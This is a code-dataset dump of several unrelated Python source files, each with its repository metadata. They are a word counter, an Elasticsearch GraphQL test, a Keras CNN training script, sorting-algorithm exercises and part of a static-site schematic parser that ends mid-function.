seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
22913601493 |
def main():
    """Read a line of text, then print each word with its occurrence count,
    left-aligned to the length of the longest word."""
    text = input("Enter your string: ")
    words = text.split(" ")
    words.sort()
    counts = create_dictionary(words)
    width = find_longest_word(words)
    for word in counts:
        print("{:{}s} : {}".format(word, width, counts[word]))
def create_dictionary(split_string):
    """Count occurrence of each word and return a dict mapping word -> count.

    Uses collections.Counter (the stdlib replacement for the hand-rolled
    counting loop); keys keep first-occurrence order, same as before.
    """
    from collections import Counter
    return dict(Counter(split_string))
def find_longest_word(split_string):
    """From a list of strings, return the length of the longest one.

    Returns 0 for an empty list (same as the original loop's starting value).
    """
    return max(map(len, split_string), default=0)
# Guard the entry point so importing this module does not prompt for input.
if __name__ == "__main__":
    main()
| SPritchard86/cp1404 | cp1404Practicals/prac_05/word_occurrences.py | word_occurrences.py | py | 1,062 | python | en | code | 0 | github-code | 50 |
4643678359 | import logging
import unittest
import factories
from .base import BaseGrapheneElasticTestCase
from ..constants import ALL, VALUE
__all__ = (
'HighlightBackendElasticTestCase',
)
logger = logging.getLogger(__name__)
class HighlightBackendElasticTestCase(BaseGrapheneElasticTestCase):
    """Tests for the GraphQL ``source`` argument: only the fields listed in
    ``source:[...]`` should come back populated; the rest should be None.

    NOTE(review): despite the class name mentioning "Highlight", the queries
    below exercise the source backend — presumably copied from a sibling
    test module; confirm against the backend under test.
    """
    def setUp(self):
        # Create posts whose title and content both mention "Alice" so a
        # content search matches all of them.
        super(HighlightBackendElasticTestCase, self).setUp()
        self.alice = "Alice"
        self.num_alice_posts = 9
        self.alice_posts = factories.PostFactory.create_batch(
            self.num_alice_posts
        )
        for _post in self.alice_posts:
            _post.title = "{} {} {}".format(
                self.faker.word().title(),
                self.alice,
                self.faker.word()
            )
            _post.content = "{} {} {}".format(
                self.faker.paragraph(),
                self.alice,
                self.faker.paragraph()
            )
            _post.save()
        # Give Elasticsearch time to index the freshly saved documents.
        self.sleep(2)
    def __check_values(self, edges, stack, empty_stack):
        """Assert every node has non-None values for keys in ``stack`` and
        None for keys in ``empty_stack``; other keys are ignored."""
        for node in edges:
            for key, value in node['node'].items():
                if key in stack:
                    self.assertIsNotNone(value)
                elif key in empty_stack:
                    self.assertIsNone(value)
    def __test_search_content(self, search, num_posts, stack, empty_stack):
        """Execute a search restricted to ``source:[title, comments, id]``.

        :param search: search argument fragment, e.g. content:{%s:"%s"}
        :param num_posts: expected number of matching edges
        :param stack: keys expected to be populated
        :param empty_stack: keys expected to be None (not sourced)
        :return: the executed query result
        """
        query = """
        query {
          allPostDocuments(search:%s, source:[title, comments, id]) {
            edges {
              node {
                id
                title
                content
                category
                comments{
                  author{
                    name
                    age
                  }
                  content
                  createdAt
                }
              }
            }
          }
        }
        """ % search
        logger.info(query)
        executed = self.client.execute(query)
        self.assertEqual(
            len(executed['data']['allPostDocuments']['edges']),
            num_posts
        )
        self.__check_values(
            executed['data']['allPostDocuments']['edges'],
            stack,
            empty_stack
        )
        return executed
    def _test_search_content(self):
        """Test that only sourced fields are populated on a content search.

        :return:
        """
        # Covering specific field lookups: `search:{title:{value:"Another"}}`
        with self.subTest('Test search the content on term "Django"'):
            self.__test_search_content(
                '{content:{%s:"%s"}}' % (VALUE, self.alice),
                self.num_alice_posts,
                ['title', 'comments', 'id'],
                ['content', 'category']
            )
    def test_all(self):
        """Test all.
        Since we don't write in specific tests, it's more efficient to run
        them all from a single method in order to save on speed ups between
        tests.
        """
        self._test_search_content()
# Allow running this test module directly with `python`.
if __name__ == '__main__':
    unittest.main()
| barseghyanartur/graphene-elastic | src/graphene_elastic/tests/test_source_backend.py | test_source_backend.py | py | 3,125 | python | en | code | 71 | github-code | 50 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Dec 19 20:09:54 2019
@author: Juliane
"""
from helpers_DNN import *
from models_DNN import *
from keras.utils import to_categorical
from sklearn.model_selection import train_test_split
# Training hyper-parameters for the DNN experiments.
EMBEDDING_DIM = 30
BATCH_SIZE = 512
EPOCHS = 260
### Build simple DNN (LSTM, Classical-CNN, Multi-channel CNN)
# Vectorize text data (PCA-reduced embeddings; vectorization comes from
# helpers_DNN via the wildcard import above).
_, labels, feat_matrices = vectorization(pca=True, pca_comp=30, embedding_dim=EMBEDDING_DIM)
# Convert labels to 2 categorical variables, to be able to use categorical_crossentropy loss function
labels = to_categorical(labels)
# Hold out 20% of the data for validation; fixed seed for reproducibility.
X_train, X_test, y_train, y_test = train_test_split(feat_matrices, labels, test_size=0.2, random_state=1)
# Pick one architecture; the two alternatives are kept below for reference.
model = build_classical_CNN(EMBEDDING_DIM)
# model = build_multichannel_CNN(EMBEDDING_DIM)
# model = build_LSTM(EMBEDDING_DIM)
history = model.fit(X_train,
                    y_train,
                    batch_size=BATCH_SIZE,
                    epochs=EPOCHS,
                    validation_data=(X_test,y_test),
                    verbose=1)
# Plot the training curves and report the model architecture.
plot_history(history)
print(model.summary())
### Build multi-embeddings CNN
"""
MAXIMAL_TWEET_LENGTH = 60
padded_sequences, embedding_matrix, labels, vocab_size = multichannel_vectorization(MAXIMAL_TWEET_LENGTH, pca=True, pca_comp=30, embedding_dim=EMBEDDING_DIM)
model = build_multichannel_embeddings(vocab_size, EMBEDDING_DIM, embedding_matrix, MAXIMAL_TWEET_LENGTH)
history = model.fit(padded_sequences, labels, validation_split=0.2, epochs=100, batch_size=200, verbose=2)
plot_history(history)
print(model.summary())
""" | Florent-Sierro/ML_Project_2 | src/main_DNN.py | main_DNN.py | py | 1,616 | python | en | code | 0 | github-code | 50 |
3675159960 | import timeit
# import random
# alist = random.sample(range(1,101),20) #random.sample()生成不相同的随机数
# print(alist)
# Practice implementations of common sorting algorithms.
# All sorts below consider ascending order; for descending, just reverse the result.
# Selection sort:
# In one sentence: for each position from front to back, select the smallest
# remaining element and place it there.
# Average time complexity O(n^2).
def selection_sort(alist, odrer="asc"):
    """Selection-sort a copy of *alist*, print timing/iteration stats, and
    return the sorted list.

    Fixes two defects in the original: the documented ``odrer`` flag
    ("asc" = ascending, anything else = descending) was silently ignored,
    and the sorted result was never returned.
    """
    alist = list(alist)  # copy so repeated calls never mutate the caller's data
    start = timeit.default_timer()
    times = 0
    alen = len(alist)
    for i in range(0, alen):
        smallest = i
        # find the index of the minimum of alist[i:]
        for j in range(i + 1, alen):
            if alist[j] < alist[smallest]:
                smallest = j
            times += 1
        if smallest != i:
            alist[i], alist[smallest] = alist[smallest], alist[i]
    if odrer != "asc":
        alist.reverse()  # descending is the reversed ascending result
    print("Time used:", (timeit.default_timer() - start) * 1000, "ms")
    print("选择排序迭代次数:", times)
    print(alist)
    return alist
# Bubble sort:
# In one sentence: from back to front, each pass bubbles the largest of the
# remaining prefix to its final position by swapping adjacent pairs.
# Average time complexity O(n^2).
def bubble_sort(alist, odrer="asc"):
    """Bubble-sort a copy of *alist*, print timing/iteration stats, and
    return the sorted list.

    Fixes two defects in the original: the documented ``odrer`` flag
    ("asc" = ascending, anything else = descending) was silently ignored,
    and the sorted result was never returned.
    """
    start = timeit.default_timer()
    alist = list(alist)  # copy so repeated calls never mutate the caller's data
    times = 0
    alen = len(alist)
    for i in range(0, alen - 1):
        for j in range(0, alen - i - 1):
            # swap adjacent out-of-order pairs
            if alist[j] > alist[j + 1]:
                alist[j], alist[j + 1] = alist[j + 1], alist[j]
            times += 1
    if odrer != "asc":
        alist.reverse()  # descending is the reversed ascending result
    print("Time used:", (timeit.default_timer() - start) * 1000, "ms")
    print("冒泡排序迭代次数:", times)
    print(alist)
    return alist
# Insertion sort:
# In one sentence: from front to back, insert each element into the already
# sorted prefix before it.
# Average time complexity O(n^2); generally faster than bubble sort.
def insertion_sort(alist, odrer="asc"):
    """Insertion-sort a copy of *alist*, print timing/iteration stats, and
    return the sorted list.

    Fixes two defects in the original: the documented ``odrer`` flag
    ("asc" = ascending, anything else = descending) was silently ignored,
    and the sorted result was never returned.
    """
    start = timeit.default_timer()
    alist = list(alist)  # copy so repeated calls never mutate the caller's data
    times = 0
    alen = len(alist)
    for i in range(0, alen):
        position = i
        current_value = alist[position]
        # shift current_value forward until a smaller-or-equal element is met
        while position > 0 and alist[position - 1] > current_value:
            alist[position] = alist[position - 1]
            alist[position - 1] = current_value
            position -= 1
        times += 1
    if odrer != "asc":
        alist.reverse()  # descending is the reversed ascending result
    print("Time used:", (timeit.default_timer() - start) * 1000, "ms")
    print("插入排序迭代次数:", times)
    print(alist)
    return alist
# Shell sort: insertion sort with a shrinking gap (diminishing increments).
# Elements far apart are compared first (gap = n/2, halved each round,
# Donald Shell's original sequence) so items move long distances quickly;
# the final gap of 1 is a plain insertion sort over nearly-sorted data.
# Average time complexity O(n log2 n); generally faster than plain insertion.
def shell_sort(alist, odrer="asc"):
    """Shell-sort a copy of *alist*, print timing/iteration stats, and
    return the sorted list.

    Fixes two defects in the original: the documented ``odrer`` flag
    ("asc" = ascending, anything else = descending) was silently ignored,
    and the sorted result was never returned.
    """
    start = timeit.default_timer()
    alist = list(alist)  # copy so repeated calls never mutate the caller's data
    times = 0
    alen = len(alist)
    # initial gap: half the list length, halved after each pass
    gap = alen // 2
    while gap > 0:
        for i in range(gap, alen):
            # gapped insertion sort for this stride
            position = i
            current_value = alist[position]
            while position >= gap and alist[position - gap] > current_value:
                alist[position] = alist[position - gap]
                alist[position - gap] = current_value
                position -= gap
            times += 1
        gap = gap // 2
    if odrer != "asc":
        alist.reverse()  # descending is the reversed ascending result
    print("Time used:", (timeit.default_timer() - start) * 1000, "ms")
    print("希尔排序迭代次数:", times)
    print(alist)
    return alist
# Quicksort ("dig a hole and fill it" partitioning + divide and conquer):
# pick the first element of the range as the pivot, scan from the right for
# something smaller and drop it into the hole on the left, then scan from
# the left for something larger and drop it into the hole on the right;
# when the scans meet, the pivot goes into the final hole and both halves
# are sorted recursively. Average time complexity O(n log2 n).
def quick_sort(alist, lb=None, ub=None):
    """Quicksort *alist* in place (ascending) and return it.

    lb/ub are the inclusive lower/upper bounds of the range to sort;
    both default to the whole list. Non-list input or an invalid range
    returns an error string instead of raising (preserved behaviour).
    Note: lists are passed by reference, so the caller's list is mutated.
    """
    if not isinstance(alist, list):
        return "第一参数不是list"
    length = len(alist)
    if length <= 1:
        return alist
    if lb is None or ub is None:
        lb, ub = 0, length - 1
    elif lb < 0 or ub > length - 1 or lb > ub:
        return "Error:快排起止点越界或者顺序不合理!"
    left, right = lb, ub
    pivot = alist[lb]  # taking the pivot leaves a "hole" at index lb
    while left < right:
        # scan right-to-left for a value below the pivot
        while alist[right] >= pivot and left < right:
            right -= 1
        if alist[right] < pivot and left < right:
            alist[left] = alist[right]  # fill the left hole, open one on the right
            left += 1
        # scan left-to-right for a value above the pivot
        while alist[left] <= pivot and left < right:
            left += 1
        if alist[left] > pivot and left < right:
            alist[right] = alist[left]  # fill the right hole, open one on the left
            right -= 1
    alist[left] = pivot  # scans met: the pivot's final position
    quick_sort(alist, lb, left - 1)
    quick_sort(alist, left + 1, ub)
    return alist
# print("Time used:",(timeit.default_timer() - start)*1000,"ms")
# print("希尔排序迭代次数:",times)
# print(alist)
# When a mutable object (list, dict) is passed to a function, the argument is
# passed by reference, unlike the value semantics of plain variables.
# l1=(8,13,2,1,9,7,4,6)
# Sample data is a tuple so each sort works on its own fresh copy.
l1=(82, 11, 99, 8, 59, 83, 48, 12, 39, 63, 44, 73, 41, 86, 79, 35, 13, 98, 10, 42)
# selection_sort(l1)
# bubble_sort(l1)
# insertion_sort(l1)
shell_sort(l1)
# l3=[82, 11, 99, 8, 59, 83, 48, 12, 39, 63, 44, 73, 41, 86, 79, 35, 13, 98, 10, 42]
# start=timeit.default_timer()
# print(quick_sort(l3))
# print("Time used:",(timeit.default_timer() - start)*1000,"ms")
# # a = b = 1
# # print(a,b)
# aaa = [3*x for x in l1]
# print(aaa)
# Factorial
def fact(n):
    """Return n! for a non-negative integer n (0! == 1).

    The previous version only had a base case for n == 1, so fact(0)
    recursed until RecursionError; n <= 1 covers that.
    """
    if n <= 1:
        return 1
    return n * fact(n - 1)
# print(fact(120)) | jasonshaw/learningpython | test.py | test.py | py | 8,663 | python | zh | code | 0 | github-code | 50 |
38949396195 | # read schematic functions
from libraries import constants as ct
from libraries import globals as gb
from libraries import schematics as sch
from libraries import meta_elements as me
from libraries import html_elements as he
from libraries import string_processes as sp
from libraries import header
from libraries import main
from libraries import before_after
from libraries import footer
from libraries import lists as ls
def get_settings(content):
    """Build the site settings dictionary from a settings schematic.

    Splits ``content`` into its tagged sections, runs each section through
    the settings command pipeline and stores the resulting default HTML
    fragments (plus header/footer additions) on the returned settings
    dict (based on gb.DEFAULT_SETTINGS).
    """
    type_none = ct.PCOM_NO_ENTRY
    out = sp.pcom_build_dictionary(gb.DEFAULT_SETTINGS)
    settings = sp.pcom_build_dictionary(gb.DEFAULT_SETTINGS)
    args = sp.pcom_build_dictionary(gb.DEFAULT_GET_FIRST_COMMAND_ARGS)
    schematic_content = pcom_get_schematic_tags(content)
    out = me.pcom_process_settings_meta_syntax(schematic_content['meta'], out)
    default_header, settings = polimorf_process_settings_schematic(
        schematic=schematic_content['header'],
        args=args,
        placement=ct.PCOM_SETTINGS_HEADER,
        type=type_none,
        settings=out)
    default_before, settings = polimorf_process_settings_schematic(
        schematic=schematic_content['before'],
        args=args,
        placement=ct.PCOM_SETTINGS_BEFORE,
        type=type_none,
        settings=out)
    default_main, settings = polimorf_process_settings_schematic(
        schematic=schematic_content['main'],
        args=args,
        placement=ct.PCOM_SETTINGS_MAIN,
        type=type_none,
        settings=out)
    # BUGFIX: the 'after' schematic was previously processed twice in a row
    # (verbatim copy/paste duplication); it is processed once now.
    default_after, settings = polimorf_process_settings_schematic(
        schematic=schematic_content['after'],
        args=args,
        placement=ct.PCOM_SETTINGS_AFTER,
        type=type_none,
        settings=out)
    default_sidebar, settings = polimorf_process_settings_schematic(
        schematic=schematic_content['sidebar'],
        args=args,
        placement=ct.PCOM_SETTINGS_SIDEBAR,
        type=type_none,
        settings=out)
    default_footer, settings = polimorf_process_settings_schematic(
        schematic=schematic_content['footer'],
        args=args,
        placement=ct.PCOM_SETTINGS_FOOTER,
        type=type_none,
        settings=out)
    default_header_additions = polimorf_process_additions_schematic(
        schematic=schematic_content['header'],
        args=args,
        placement=ct.PCOM_SETTINGS_HEADER,
        type=type_none)
    default_footer_additions = polimorf_process_additions_schematic(
        schematic=schematic_content['footer'],
        args=args,
        placement=ct.PCOM_SETTINGS_FOOTER,
        type=type_none)
    # store the rendered defaults on the settings dict that is returned
    out['default_header'] = sp.pcom_create_html_from_array(default_header)
    out['default_before'] = sp.pcom_create_html_from_array(default_before)
    out['default_main'] = sp.pcom_create_html_from_array(default_main)
    out['default_after'] = sp.pcom_create_html_from_array(default_after)
    out['default_sidebar'] = sp.pcom_create_html_from_array(default_sidebar)
    out['default_footer'] = sp.pcom_create_html_from_array(default_footer)
    if default_header_additions and default_header_additions != ct.PCOM_NO_ENTRY:
        out['default_header_additions'] = sp.pcom_create_html_from_array(default_header_additions)
    if default_footer_additions and default_footer_additions != ct.PCOM_NO_ENTRY:
        out['default_footer_additions'] = sp.pcom_create_html_from_array(default_footer_additions)
    return out
def polimorf_determine_schematic_reference(content, settings):
    """Process a page schematic into per-section HTML fragment lists.

    Returns a dict with the processed sections ('processed'), the raw
    section text ('schematic_content') and the possibly-updated settings
    ('processed_settings').  Sections are only processed when META data
    is present.  (Six unused local constant aliases were removed.)
    """
    out = {}
    # get schematic content per tag
    schematic_content = pcom_get_schematic_tags(content)
    # reset postlist present
    settings['postlist_present'] = False
    # if no meta data, only the raw meta tag is returned
    out['meta'] = schematic_content['meta']
    if schematic_content['meta'] != ct.PCOM_NO_ENTRY:
        args = sp.pcom_build_dictionary(gb.DEFAULT_GET_FIRST_COMMAND_ARGS)
        out['meta'] = me.pcom_process_meta_syntax(schematic_content['meta'])
        out['header'], settings = polimorf_process_schematic(
            schematic=schematic_content['header'],
            args=args,
            placement=ct.PCOM_HEADER_PLACEMENT,
            type=ct.PCOM_NO_ENTRY,
            settings=settings)
        out['before'], settings = polimorf_process_schematic(
            schematic=schematic_content['before'],
            args=args,
            placement=ct.PCOM_MAIN_PLACEMENT,
            type=ct.PCOM_BEFORE_TYPE,
            settings=settings)
        out['after'], settings = polimorf_process_schematic(
            schematic=schematic_content['after'],
            args=args,
            placement=ct.PCOM_MAIN_PLACEMENT,
            type=ct.PCOM_AFTER_TYPE,
            settings=settings)
        # main uses a different placement when a sidebar section exists
        if (schematic_content['sidebar'] != ct.PCOM_NO_ENTRY):
            out['main'], settings = polimorf_process_schematic(
                schematic=schematic_content['main'],
                args=args,
                placement=ct.PCOM_MAIN_WITH_SIDEBAR_PLACEMENT,
                type=ct.PCOM_NO_ENTRY,
                settings=settings)
            out['sidebar'], settings = polimorf_process_schematic(
                schematic=schematic_content['sidebar'],
                args=args,
                placement=ct.PCOM_SIDEBAR_PLACEMENT,
                type=ct.PCOM_NO_ENTRY,
                settings=settings)
        else:
            out['main'], settings = polimorf_process_schematic(
                schematic=schematic_content['main'],
                args=args,
                placement=ct.PCOM_MAIN_PLACEMENT,
                type=ct.PCOM_NO_ENTRY,
                settings=settings)
            out['sidebar'] = [ct.PCOM_NO_ENTRY]
        out['footer'], settings = polimorf_process_schematic(
            schematic=schematic_content['footer'],
            args=args,
            placement=ct.PCOM_FOOTER_PLACEMENT,
            type=ct.PCOM_NO_ENTRY,
            settings=settings)
    return {'processed': out, 'schematic_content': schematic_content, 'processed_settings': settings}
#
# Parse schematic using tags. Function returns schematic sections
# that are used to set globals for further schematic processing
#
def pcom_get_schematic_tags(format):
    """Split a raw schematic string into its tagged sections.

    Returns a dict (seeded from gb.DEFAULT_SCHEMATICS) containing the text
    between the META/HEADER/MAIN/FOOTER tags, plus the optional
    BEFORE/SIDEBAR/AFTER sections and their *_found flags when present.
    Sections keep their defaults when the mandatory tags are missing or
    out of order.
    """
    # function returns header, main and schematic as an array of strings
    meta_tag = ct.PCOM_META_TAG
    header_tag = ct.PCOM_HEADER_SCHEMATIC_TAG
    main_tag = ct.PCOM_MAIN_SCHEMATIC_TAG
    footer_tag = ct.PCOM_FOOTER_SCHEMATIC_TAG
    sidebar_tag = ct.PCOM_SIDEBAR_SCHEMATIC_TAG
    before_tag = ct.PCOM_BEFORE_MAIN_SCHEMATIC_TAG
    after_tag = ct.PCOM_AFTER_MAIN_SCHEMATIC_TAG
    # tag lengths, used to skip past each tag when slicing sections out
    meta_tag_offset = len(meta_tag)
    header_tag_offset = len(header_tag)
    main_tag_offset = len(main_tag)
    footer_tag_offset = len(footer_tag)
    # set up array for output - defaults are empty
    out_formats = sp.pcom_build_dictionary(gb.DEFAULT_SCHEMATICS)
    #
    # locate the first occurrence of each mandatory tag (-1 when absent)
    meta_tag_pos = format.find(meta_tag)
    header_tag_pos = format.find(header_tag)
    main_tag_pos = format.find(main_tag)
    footer_tag_pos = format.find(footer_tag)
    #
    # meta tag must be there
    if (meta_tag_pos) > -1:
        # the four mandatory tags must appear in META < HEADER < MAIN < FOOTER
        # order; the chained comparisons also reject any missing (-1) tag
        # that would break the ordering
        if ( ( footer_tag_pos > main_tag_pos) and
            ( main_tag_pos > header_tag_pos) and
            (header_tag_pos > meta_tag_pos) ):
            out_formats['meta'] = format[meta_tag_pos+meta_tag_offset : header_tag_pos]
            out_formats['header'] = format[header_tag_pos+header_tag_offset : main_tag_pos]
            out_formats['main'] = format[main_tag_pos+main_tag_offset : footer_tag_pos]
            out_formats['footer'] = format[footer_tag_pos+footer_tag_offset:]
            # ================
            # CONDITIONAL tags
            # ================
            # process header to see if there is a BEFORE tag
            before_search = sp.pcom_get_strings_syntax_separator(out_formats['header'],before_tag,True)
            if before_search['command_found']:
                out_formats['before_found'] = True
                out_formats['header'] = before_search['syntax_before']
                out_formats['before'] = before_search['syntax_after']
            # process main to see if there is a SIDEBAR tag
            sidebar_search = sp.pcom_get_strings_syntax_separator(out_formats['main'],sidebar_tag,True)
            #
            if sidebar_search['command_found']:
                out_formats['sidebar_found'] = True
                out_formats['main'] = sidebar_search['syntax_before']
                out_formats['sidebar'] = sidebar_search['syntax_after']
                # AFTER may live inside the SIDEBAR section when both exist
                after_search = sp.pcom_get_strings_syntax_separator(out_formats['sidebar'],after_tag,True)
                if after_search['command_found']:
                    out_formats['after_found'] = True
                    out_formats['sidebar'] = after_search['syntax_before']
                    out_formats['after'] = after_search['syntax_after']
            else:
                # no sidebar: AFTER is looked for in the MAIN section instead
                after_search = sp.pcom_get_strings_syntax_separator(out_formats['main'],after_tag,True)
                if after_search['command_found']:
                    out_formats['after_found'] = True
                    out_formats['main'] = after_search['syntax_before']
                    out_formats['after'] = after_search['syntax_after']
    #
    return out_formats
#
# General schematic command loop
# Uses global list of commands for reference
#
def polimorf_process_schematic(schematic,args,placement,type,settings):
    """Run the schematic command loop over ``schematic``.

    First pass translates each command into an HTML fragment via
    he.pcom_command_selection; a second pass over the same schematic
    collects header/footer additions via he.pcom_addition_selection.
    Returns (out, settings) where out is the list of fragments, or
    [ct.PCOM_NO_ENTRY] when there is no schematic content.
    (Dead ``command = ...`` assignments were removed.)
    """
    # keep a copy so the additions pass can re-scan the same schematic
    schematic_orig = schematic
    if schematic == ct.PCOM_NO_ENTRY:
        out = [ct.PCOM_NO_ENTRY]
    else:
        out = []
    # first pass: translate each command into an HTML fragment
    schematic_commands = sp.pcom_build_dictionary(gb.DEFAULT_GET_FIRST_COMMAND_OUTPUTS)
    schematic_commands['next_command'] = ""
    while schematic_commands['next_command'] != ct.PCOM_NO_ENTRY:
        schematic_commands = sp.pcom_get_first_command(schematic,args)
        syntax,settings = he.pcom_command_selection(
            command=schematic_commands['command'],
            syntax=schematic_commands['command_syntax'],
            placement=placement,
            type=type,
            settings=settings)
        schematic = schematic_commands['next_command']
        out.append(syntax)
    # second pass: collect header/footer additions from the same schematic
    schematic = schematic_orig
    type = ct.PCOM_NO_ENTRY
    schematic_commands = sp.pcom_build_dictionary(gb.DEFAULT_GET_FIRST_COMMAND_OUTPUTS)
    schematic_commands['next_command'] = ""
    while schematic_commands['next_command'] != ct.PCOM_NO_ENTRY:
        schematic_commands = sp.pcom_get_first_command(schematic,args)
        settings = he.pcom_addition_selection(
            command=schematic_commands['command'],
            syntax=schematic_commands['command_syntax'],
            placement=placement,
            type=type,
            settings=settings)
        schematic = schematic_commands['next_command']
    return out,settings
def polimorf_process_settings_schematic(schematic,args,placement,type,settings):
    """Settings variant of the schematic command loop.

    Expands the DEFAULT command into the placement's default schematic
    before processing.  Returns (out, settings) where out is a list of
    HTML fragments, or [ct.PCOM_NO_ENTRY] when there is no schematic.
    (Unused ``schematic_orig`` and dead ``command`` assignments removed.)
    """
    # convert the settings placement to the one used when parsing the html
    placement_for_html = pcom_determine_placement(placement)
    if schematic == ct.PCOM_NO_ENTRY:
        out = [ct.PCOM_NO_ENTRY]
    else:
        out = []
    # set command data array
    schematic_commands = sp.pcom_build_dictionary(gb.DEFAULT_GET_FIRST_COMMAND_OUTPUTS)
    schematic_commands['next_command'] = ""
    # loop over schematic data
    while schematic_commands['next_command'] != ct.PCOM_NO_ENTRY:
        schematic_commands = sp.pcom_get_first_command(schematic,args)
        # if command is DEFAULT, replace content with the default schematic
        # for this placement and reprocess
        if schematic_commands['command'] == ct.PCOM_DEFAULT_COMMAND:
            schematic = he.pcom_use_settings_defaults(placement, settings)
            schematic += schematic_commands['next_command']
            schematic_commands = sp.pcom_get_first_command(schematic,args)
        syntax,settings = he.pcom_command_selection(
            command=schematic_commands['command'],
            syntax=schematic_commands['command_syntax'],
            placement=placement_for_html,
            type=type,
            settings=settings)
        schematic = schematic_commands['next_command']
        out.append(syntax)
    return out,settings
def polimorf_process_additions_schematic(schematic,args,placement,type):
    """Collect header/footer additions generated by a settings schematic.

    Returns the list of additions for a HEADER or FOOTER settings
    placement; for other placements returns '' (or ct.PCOM_NO_ENTRY
    when there is no schematic content).
    (Dead ``command = ...`` assignment removed.)
    """
    # convert the settings placement to the one used when parsing the html
    placement_for_html = pcom_determine_placement(placement)
    local_settings = {'header_additions': [],
                      'footer_additions': []}
    if schematic == ct.PCOM_NO_ENTRY:
        out = ct.PCOM_NO_ENTRY
    else:
        out = ''
    # loop over the schematic, letting the addition selector accumulate
    # into local_settings
    type = ct.PCOM_NO_ENTRY
    schematic_commands = sp.pcom_build_dictionary(gb.DEFAULT_GET_FIRST_COMMAND_OUTPUTS)
    schematic_commands['next_command'] = ""
    while schematic_commands['next_command'] != ct.PCOM_NO_ENTRY:
        schematic_commands = sp.pcom_get_first_command(schematic,args)
        local_settings = he.pcom_addition_selection(
            command=schematic_commands['command'],
            syntax=schematic_commands['command_syntax'],
            placement=placement_for_html,
            type=type,
            settings=local_settings)
        schematic = schematic_commands['next_command']
    if placement == ct.PCOM_SETTINGS_HEADER:
        out = local_settings['header_additions']
    if placement == ct.PCOM_SETTINGS_FOOTER:
        out = local_settings['footer_additions']
    return out
def pcom_determine_placement(placement):
    """Convert a settings placement constant into the placement constant
    used when parsing/emitting HTML.

    Raises KeyError for an unknown placement (the previous if-chain left
    ``placement_out`` unbound and raised UnboundLocalError instead).
    """
    mapping = {
        ct.PCOM_SETTINGS_HEADER: ct.PCOM_HEADER_PLACEMENT,
        ct.PCOM_SETTINGS_BEFORE: ct.PCOM_MAIN_PLACEMENT,
        ct.PCOM_SETTINGS_MAIN: ct.PCOM_MAIN_PLACEMENT,
        ct.PCOM_SETTINGS_AFTER: ct.PCOM_MAIN_PLACEMENT,
        ct.PCOM_SETTINGS_SIDEBAR: ct.PCOM_SIDEBAR_PLACEMENT,
        ct.PCOM_SETTINGS_FOOTER: ct.PCOM_FOOTER_PLACEMENT,
    }
    return mapping[placement]
# output html from processed schematic
def polimorf_process_schematic_sections(data, settings,filename,fileroot):
    """Assemble the final page HTML from processed schematic sections.

    ``data`` is a dict of per-section fragment lists (meta/header/before/
    main/after/sidebar/footer).  Returns the assembled HTML string, or
    ct.PCOM_NO_ENTRY when there is no meta data.
    """
    # data is a dictionary with the different sections
    # if no meta data return no entry
    meta_present = False
    out_html = ct.PCOM_NO_ENTRY
    # wrap flags: when BEFORE is missing MAIN opens the wrap; when MAIN is
    # also missing AFTER opens it
    add_main_wrap = False
    add_after_wrap = False
    no_before = False
    no_main = False
    is_template,is_search = sp.pcom_filter_template(fileroot,settings)
    if data['meta'] != ct.PCOM_NO_ENTRY:
        meta_present = True
        out_html = ''
        out_html = header.polimorf_head_and_title(meta_present,settings,data['meta'],filename,fileroot)
        if data['header'] != [ct.PCOM_NO_ENTRY]:
            out_html += header.polimorf_add_header(data['header'],meta_present) + ct.NL
        if data['before'] != [ct.PCOM_NO_ENTRY]:
            out_html += before_after.polimorf_add_before(data['before'],data['sidebar'],meta_present)
        else:
            add_main_wrap = True
            no_before = True
        # templates always get a MAIN section even when its data is empty
        if data['main'] != [ct.PCOM_NO_ENTRY] or is_template:
            out_html += main.polimorf_add_main(
                            main_data=data['main'],
                            sidebar_data=data['sidebar'],
                            meta_present=meta_present,
                            wrap=add_main_wrap,
                            fileroot=fileroot,
                            settings=settings,
                            is_template=is_template,
                            is_search=is_search)
        else:
            add_after_wrap = True
            no_main = True
        if data['after'] != [ct.PCOM_NO_ENTRY]:
            out_html += (before_after.polimorf_add_after(
                            after_data=data['after'],
                            sidebar_data=data['sidebar'],
                            meta_present=meta_present,
                            wrap=add_after_wrap) + ct.NL)
        else:
            # no AFTER section: close (or open+close) the main wrap here
            if no_before and no_main:
                out_html += sch.PM_MAIN_WRAP_OPEN + ct.NL + sch.PM_MAIN_WRAP_CLOSE + ct.NL
            else:
                out_html += sch.PM_MAIN_WRAP_CLOSE + ct.NL
        if data['footer'] != [ct.PCOM_NO_ENTRY]:
            out_html += footer.polimorf_add_footer(data['footer'],meta_present)
        # close body and html tags
        out_html += sch.DEFAULT_FOOTER_SCRIPTS
        out_html += sch.PM_CLOSE_BODY_TAG
        out_html += sch.PM_CLOSE_HTML_TAG
    return out_html
def pcom_process_inserts(html_array,insert_info,outlog,site_settings,filename,dependencies):
    """Expand insert placeholders in ``html_array`` and track dependencies.

    Valid inserts are run through the schematic command loop and the
    generated HTML is written back at the recorded index; invalid inserts
    are blanked and flagged in the log.  Returns the updated
    (html_array, outlog, site_settings, dependencies).
    (Removed the unused ``local_deps`` lookup and stale commented-out code.)
    """
    args = sp.pcom_build_dictionary(gb.DEFAULT_GET_FIRST_COMMAND_ARGS)
    valid_inserts = []
    for insert in insert_info:
        key_ref = insert['filename']
        if insert['valid_entry'] == ct.PCOM_VALID_ENTRY:
            # process insert through the schematic command loop
            type_none = ct.PCOM_NO_ENTRY
            insert_out_data,site_settings = polimorf_process_schematic(
                schematic=insert['content'],
                args=args,
                placement=insert['placement'],
                type=type_none,
                settings=site_settings)
            insert_out = sp.pcom_create_html_from_array(insert_out_data)
            # put the generated html back in the content
            html_array[insert['index']] = insert_out
            # update dependencies - no change if insert file is already listed
            dependencies = ls.pcom_update_dependencies(dependencies,filename,key_ref)
            # update local record of inserts processed
            valid_inserts.append(key_ref)
        else:
            # unknown insert file: blank the line and flag it in the log key
            key_ref += ':No such file'
            html_array[insert['index']] = ''
        # add log entry
        inserts_processed_string = filename + '--' + key_ref + '-PLACEMENT=' + insert['placement']
